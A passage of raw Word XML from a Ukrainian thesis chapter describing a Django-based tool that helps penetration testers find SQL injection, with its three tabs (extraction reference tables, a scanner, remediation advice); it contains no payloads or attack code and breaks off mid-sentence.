      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_Toc30433148"/>
      <w:r w:rsidRPr="00846B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">РОЗДІЛ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="109"/>
    </w:p>
    <w:p w14:paraId="76B9203E" w14:textId="2383B27A" w:rsidR="002425F2" w:rsidRPr="00C0553F" w:rsidRDefault="002425F2" w:rsidP="002425F2">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="432"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc516752156"/>
      <w:bookmarkStart w:id="111" w:name="_Toc30433149"/>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ЕТАПИ РОБОТИ </w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>РОЗРОБЛЕНОГО ІНСТРУМЕНТУ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="7AA83E25" w14:textId="7D35B5BC" w:rsidR="002425F2" w:rsidRDefault="002425F2" w:rsidP="002425F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1089FAC4" w14:textId="77777777" w:rsidR="00101F0F" w:rsidRPr="00101F0F" w:rsidRDefault="00101F0F" w:rsidP="002425F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181DA0C8" w14:textId="7442B0F3" w:rsidR="002425F2" w:rsidRDefault="002425F2" w:rsidP="002425F2">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="576"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="112" w:name="_Toc516752157"/>
      <w:bookmarkStart w:id="113" w:name="_Toc30433150"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0553F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> Описання </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>інструменту</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w14:paraId="63BE22C9" w14:textId="10495436" w:rsidR="002425F2" w:rsidRDefault="002425F2" w:rsidP="005E0233">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE3CD57" w14:textId="289224B3" w:rsidR="008945BB" w:rsidRDefault="00484499" w:rsidP="005E0233">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Даний інструмент було розроблено використовуючи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Django</w:t>
      </w:r>
      <w:r w:rsidRPr="00484499">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>веб-фреймворк (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00484499">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. Даний фреймворк є надзвичайно популярним і повнофункціональним серверним веб-фреймворком, що написаний на </w:t>
      </w:r>
      <w:r w:rsidR="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> [34]</w:t>
      </w:r>
      <w:r w:rsidR="008945BB" w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E39023" w14:textId="0CB49418" w:rsidR="00484499" w:rsidRDefault="008945BB" w:rsidP="005E0233">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Також було використано </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> ("</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>JS</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">" скорочено) це повноцінна динамічна мова програмування, яка, у застосуванні до </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>HTML</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> документу, може надати динамічну інтерактивність на веб-сайтах. Вона була винайдена Бренданом </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">йхом, співзасновником проекту </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Foundation</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, та </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Mozilla</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Corporation</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>. JavaScript доволі компактна та гнучка мова. Розробники забезпечили велике розмаїття інструментів, що доповнюють основу мови JavaScript, які відкривають величезну кількість додаткового функціоналу з мінімальними зусиллями. Серед них:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A204E2" w14:textId="520DB11E" w:rsidR="008945BB" w:rsidRDefault="008945BB" w:rsidP="008945BB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Програмні інтерфейси (APIs) для браузерів — API, які вбудовані у браузери, що надають функціонал на зразок динамічного створення HTML та застосування CSS-стилів, збір та обробка відео-потоків з вебкамери користувача, генерація 3D-графіки та аудіо-семплів.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7250B971" w14:textId="7DD8C960" w:rsidR="008945BB" w:rsidRDefault="008945BB" w:rsidP="008945BB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>API третіх осіб, що дозволяють розробникам інтегрувати у власні сайти функціонал інших провайдерів, таких як Twitter або Facebook.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B26D40" w14:textId="3CE0D748" w:rsidR="008945BB" w:rsidRDefault="008945BB" w:rsidP="008945BB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Фреймворки та бібліотеки третіх осіб, які ви можете застосувати до вашого HTML, щоб прискорити створення сайтів та застосунків</w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> [35]</w:t>
      </w:r>
      <w:r w:rsidRPr="008945BB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3897D2A1" w14:textId="2ACE8F67" w:rsidR="00614A79" w:rsidRPr="00614A79" w:rsidRDefault="00614A79" w:rsidP="00614A79">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00614A79">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>HTML (мова гіпертекстової розмітки) — це код, який використовується для структурування і відображення веб-сторінки та її контенту. Наприклад, контент може бути розбитий на параграфи (абзаци), містити список, зображення чи таблицю</w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="007679D8">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007679D8" w:rsidRPr="00CE4163">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>[36]</w:t>
      </w:r>
      <w:r w:rsidRPr="00614A79">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68305144" w14:textId="751D5C56" w:rsidR="002425F2" w:rsidRDefault="005E0233" w:rsidP="005E0233">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Розроблений інструмент допомагає розробникам або </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>фахівцям з</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>тестування на проникнення</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> проводити ручне та автоматизоване тестування веб-додатків на наявність </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ін’єкцій.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56190FF5" w14:textId="7B8C43EF" w:rsidR="005E0233" w:rsidRDefault="005E0233" w:rsidP="005E0233">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Даний інструмент включає в себе наступний функціонал:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F171E6F" w14:textId="4C93103B" w:rsidR="005E0233" w:rsidRDefault="00CE1AA4" w:rsidP="005E0233">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>На першій вкладці розміщені т</w:t>
      </w:r>
      <w:r w:rsidR="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>аблиці, які допомагають при ручному тестуванні отримати дані з таких баз даних як</w:t>
      </w:r>
      <w:r w:rsidR="005E0233" w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r w:rsidR="005E0233" w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidR="005E0233" w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>PostgreSQL</w:t>
      </w:r>
      <w:r w:rsidR="005E0233" w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>і</w:t>
      </w:r>
      <w:r w:rsidR="005E0233" w:rsidRPr="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidR="005E0233">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEC0E14" w14:textId="72B02283" w:rsidR="005E0233" w:rsidRDefault="00CE1AA4" w:rsidP="005E0233">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">На другій вкладці розміщений сканер вразливостей, що виявляє </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-GB" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE1AA4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ін’єкції;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A28E0BE" w14:textId="653D4023" w:rsidR="00CE1AA4" w:rsidRPr="005E0233" w:rsidRDefault="00CE1AA4" w:rsidP="005E0233">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">На третій вкладці розміщені рекомендації, які пояснюють чому додаток вразливий до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
